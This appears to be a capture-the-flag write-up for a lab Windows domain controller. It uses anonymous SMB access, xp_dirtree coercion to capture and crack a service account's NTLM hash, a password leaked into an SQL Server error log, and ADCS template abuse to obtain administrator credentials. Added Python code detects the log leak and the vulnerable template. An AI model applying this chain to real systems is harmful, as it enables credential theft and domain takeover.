This machine is a medium-difficulty Windows box. It involves interacting with an SQL Server, using Responder to capture the Net-NTLMv2 hash of the sql_svc user, enumerating files on the system to obtain the password of another user, and finally abusing a vulnerable ADCS certificate template to gain Administrator access.
Host script results:
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 63970/tcp): CLEAN (Timeout)
|   Check 2 (port 40602/tcp): CLEAN (Timeout)
|   Check 3 (port 50586/udp): CLEAN (Timeout)
|   Check 4 (port 40313/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| ms-sql-info:
|   10.10.11.202:1433:
|     Version:
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb2-time:
|   date: 2023-04-30T00:24:38
|_  start_date: N/A
|_clock-skew: mean: 8h00m01s, deviation: 0s, median: 8h00m00s
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 29 16:25:17 2023 -- 1 IP address (1 host up) scanned in 88.77 seconds
We don't see any HTTP/HTTPS port open, so this is a classic AD machine. Starting with SMB, we can connect as the NULL user and list the shares. There is a share named Public; we can access it and see that it contains a single PDF file, which we download to our machine.
❯ smbclient -L //10.10.11.202/ -U ""
Enter WORKGROUP\'s password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        Public          Disk
        SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.202 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

❯ smbclient //10.10.11.202/Public -U ""
Enter WORKGROUP\'s password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Nov 19 11:51:25 2022
  ..                                  D        0  Sat Nov 19 11:51:25 2022
  SQL Server Procedures.pdf           A    49551  Fri Nov 18 13:39:43 2022

                5184255 blocks of size 4096. 1463762 blocks available
smb: \> mget *
Get file SQL Server Procedures.pdf? yes
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (105.7 KiloBytes/sec) (average 105.7 KiloBytes/sec)
Checking the PDF, we see that it contains information about the MSSQL Server.
The PDF mentions an email address for the user brandon.brown:
mailto:brandon.brown@sequel.htb
At the end of the PDF there is a Bonus section containing a credential for PublicUser, which can connect to the MSSQL Server.
Connecting to the MSSQL server as PublicUser, we can execute common queries such as retrieving the version, listing databases and so on. However, this user did not have permission to query any of the listed databases. The server did expose the stored procedure xp_dirtree, which lists a directory from a local or network (UNC) path and returns its contents as rows and columns.
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL> SELECT * FROM fn_my_permissions(NULL, 'SERVER');
entity_name   subentity_name   permission_name
I started Responder.py on my system and used xp_dirtree to list a share on my IP. What happens here is that our user has permission to execute xp_dirtree, but it is the SQL Server process itself that connects to the UNC path, so the connection arrives at Responder carrying the Net-NTLMv2 hash of the sql_svc user. The SQL Server service account (sql_svc) is the identity the service runs as, so even though we logged in as a low-privileged guest user, the server authenticates to the attacker's machine with the service account's credentials rather than ours.
Cracking the captured hash with hashcat and rockyou.txt was successful:
You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 2.0 pocl 1.8  Linux, None+Asserts, RELOC, LLVM 9.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================
* Device #1: pthread-11th Gen Intel(R) Core(TM) i7-11800H @ 2.30GHz, 3767/3831 MB (1024 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework

Started: Sat Apr 29 16:56:51 2023
Stopped: Sat Apr 29 16:56:53 2023
Once the hash was cracked, we can use the recovered password to connect to the machine over WinRM with evil-winrm.
As expected, this did not give us the user flag yet. Starting local enumeration of the machine, I found a directory named C:\SQLServer containing a Logs folder, and downloaded the log file from it for further inspection:
*Evil-WinRM* PS C:\SQLServer> cd Logs
*Evil-WinRM* PS C:\SQLServer\Logs> ls

    Directory: C:\SQLServer\Logs

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          2/7/2023   8:06 AM          27608 ERRORLOG.BAK

*Evil-WinRM* PS C:\SQLServer\Logs> download ERRORLOG.BAK
Info: Downloading ERRORLOG.BAK to ./ERRORLOG.BAK

Info: Download successful!
Checking the log file for interesting details, we see what appears to be the password for Ryan.Cooper: a failed logon for sequel.htb\Ryan.Cooper is immediately followed by a failed logon whose "user name" is not an account at all, which is what a password looks like when it is typed into the wrong field:
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51      Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
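As an added example (not part of the original writeup), the following Python heuristic scans an SQL Server ERRORLOG for exactly this pattern, a bare "user name" failing right after a domain account from the same client, so that leaked passwords can be rotated and scrubbed from the log. The sample log is constructed from the excerpt above with a placeholder in place of the real value.

```python
import re
from datetime import datetime, timedelta

# Constructed sample modelled on the ERRORLOG.BAK excerpt; the third line's
# "user" is a placeholder standing in for a password typed into the wrong field.
SAMPLE_LOG = """
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'Placeh0lderSecret'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51      Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
2022-11-18 13:44:10.00 Logon       Logon failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2022-11-18 13:50:00.00 Logon       Logon failed for user 'sequel.htb\\brandon.brown'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
"""

LOGON_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) Logon\s+"
    r"Logon failed for user '(?P<user>[^']+)'\..*\[CLIENT: (?P<client>[^\]]+)\]$"
)

def parse_failed_logons(text):
    """Yield (timestamp, user, client) for every 'Logon failed' line."""
    for line in text.splitlines():
        m = LOGON_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            yield ts, m["user"], m["client"]

def find_password_in_username(text, window=timedelta(seconds=5),
                              known_logins=frozenset({"sa", "PublicUser"})):
    """Return (account, leaked_value, client, ts) tuples for likely password-as-username events.

    Heuristic: a failed logon whose 'user' has no DOMAIN\\ or @ qualifier and is not a known
    SQL login, arriving within `window` of a failed logon for a domain account from the same
    client, is most likely that account's password entered in the user-name field."""
    findings, recent = [], []
    for ts, user, client in parse_failed_logons(text):
        if "\\" in user or "@" in user:
            recent.append((ts, user, client))   # a real account name: remember it
            continue
        if user in known_logins:
            continue                            # legitimate bare SQL login, not a leak
        for prev_ts, account, prev_client in reversed(recent):
            if prev_client == client and ts - prev_ts <= window:
                findings.append((account, user, client, ts))
                break
    return findings

if __name__ == "__main__":
    for account, value, client, ts in find_password_in_username(SAMPLE_LOG):
        print(f"{ts} {client}: '{value}' looks like the password of {account}; rotate it and scrub the log")
```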
Using these credentials, we can connect via evil-winrm and get the user flag:
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> dir

    Directory: C:\Users\Ryan.Cooper\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         4/29/2023   7:16 AM             34 user.txt

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> type user.txt
f682a2bd6615f9bf0a8500dfe5e45711
Since this is an AD environment, the best next step is to run adPEAS.exe to cut down on manual enumeration. It finds an ADCS service, which probably indicates the intended path:
[?] +++++ Searching for Active Directory Certificate Services Information +++++
[+] Found at least one available Active Directory Certificate Service
adPEAS does basic enumeration only, consider reading https://posts.specterops.io/certified-pre-owned-d95910965cd2

[+] Found Active Directory Certificate Services 'sequel-DC-CA':
CA Name:                        sequel-DC-CA
CA dnshostname:                 dc.sequel.htb
CA IP Address:                  10.10.11.202
Date of Creation:               11/18/2022 21:08:46
DistinguishedName:              CN=sequel-DC-CA,CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=sequel,DC=htb
NTAuthCertificates:             True
Available Templates:            UserAuthentication
                                DirectoryEmailReplication
                                DomainControllerAuthentication
                                KerberosAuthentication
                                EFSRecovery
                                EFS
                                DomainController
                                WebServer
                                Machine
                                User
                                SubCA
                                Administrator
Furthermore, there is a certificate template named UserAuthentication with the ENROLLEE_SUPPLIES_SUBJECT flag set; the sql_svc user has GenericAll permission on it, and Domain Users, which includes Ryan.Cooper, are allowed to enroll in it:
[?] +++++ Searching for Vulnerable Certificate Templates +++++
adPEAS does basic enumeration only, consider using https://github.com/GhostPack/Certify or https://github.com/ly4k/Certipy

[?] +++++ Checking Template 'UserAuthentication' +++++
[!] Template 'UserAuthentication' has Flag 'ENROLLEE_SUPPLIES_SUBJECT'
[!] Identity 'sequel\sql_svc' has 'GenericAll' permissions on template 'UserAuthentication'
[+] Identity 'sequel\Domain Users' has enrollment rights for template 'UserAuthentication'
Template Name:                  UserAuthentication
Template distinguishedname:     CN=UserAuthentication,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=sequel,DC=htb
Date of Creation:               11/18/2022 21:10:22
[+] Extended Key Usage:         Client Authentication, Secure E-mail, Encrypting File System
EnrollmentFlag:                 INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
[!] CertificateNameFlag:        ENROLLEE_SUPPLIES_SUBJECT
[!] Template Permissions:       sequel\sql_svc : GenericAll
[+] Enrollment allowed for:     sequel\Domain Users
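As an added example that is not from the writeup or from adPEAS, this Python check encodes the conditions adPEAS is flagging above (ESC1: enrollee-supplied subject plus an authentication EKU plus enrollment rights for low-privileged principals with no manager approval; ESC4: a non-admin principal with write access to the template) and compares the template with a hardened variant. The template records are constructed from the output above; PEND_ALL_REQUESTS is the msPKI enrollment flag that requires CA manager approval.

```python
# Constructed template records modelled on the adPEAS output above (not adPEAS's
# own data structures). HARDENED is a corrected variant of the same template.
LOW_PRIV = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}
ADMIN_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}
# EKUs that let a certificate authenticate as its subject (an empty EKU list also does).
AUTH_EKUS = {"Client Authentication", "PKINIT Client Authentication",
             "Smart Card Logon", "Any Purpose"}

USER_AUTHENTICATION = {
    "name": "UserAuthentication",
    "eku": ["Client Authentication", "Secure E-mail", "Encrypting File System"],
    "name_flags": ["ENROLLEE_SUPPLIES_SUBJECT"],
    "enrollment_flags": ["INCLUDE_SYMMETRIC_ALGORITHMS", "PUBLISH_TO_DS"],
    "enroll": ["sequel\\Domain Users"],
    "write": ["sequel\\sql_svc"],
}
HARDENED = {
    **USER_AUTHENTICATION,
    "name_flags": [],                    # subject is built from the AD object instead
    "enrollment_flags": ["INCLUDE_SYMMETRIC_ALGORITHMS", "PUBLISH_TO_DS",
                         "PEND_ALL_REQUESTS"],   # CA manager approval required
    "write": ["sequel\\Domain Admins"],  # only admins may edit the template
}

def short(principal):
    """'sequel\\Domain Users' -> 'Domain Users'."""
    return principal.split("\\")[-1]

def assess_template(t):
    """Return a list of findings for one template; [] means no issue detected."""
    findings = []
    auth_capable = not t["eku"] or bool(set(t["eku"]) & AUTH_EKUS)
    supplies_subject = "ENROLLEE_SUPPLIES_SUBJECT" in t["name_flags"]
    approval = "PEND_ALL_REQUESTS" in t["enrollment_flags"]
    low_priv_enrollers = [p for p in t["enroll"] if short(p) in LOW_PRIV]
    if supplies_subject and auth_capable and low_priv_enrollers and not approval:
        findings.append(
            f"ESC1: {', '.join(low_priv_enrollers)} may enroll in '{t['name']}' and supply "
            "the subject of an authentication certificate with no manager approval")
    writers = [p for p in t["write"] if short(p) not in ADMIN_GROUPS]
    if writers:
        findings.append(
            f"ESC4: {', '.join(writers)} can modify '{t['name']}' and so can re-enable "
            "any setting removed during hardening")
    return findings

if __name__ == "__main__":
    for tmpl in (USER_AUTHENTICATION, HARDENED):
        print(tmpl["name"], assess_template(tmpl) or ["OK"])
```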
Now that we know there is a vulnerable certificate template, we can use Certify to perform the attack. To confirm things first, we can query more information about the template.
Next, we obtain the certificate and its private key, and use openssl to convert them into a PFX file that will later be used to request a TGT for the administrator.
We then copy the PFX file back to the sequel machine and use Certify to request the TGT for the administrator from the forged certificate. Additionally, we can use the /getcredentials flag of Rubeus to get the NTLM hash of the administrator user: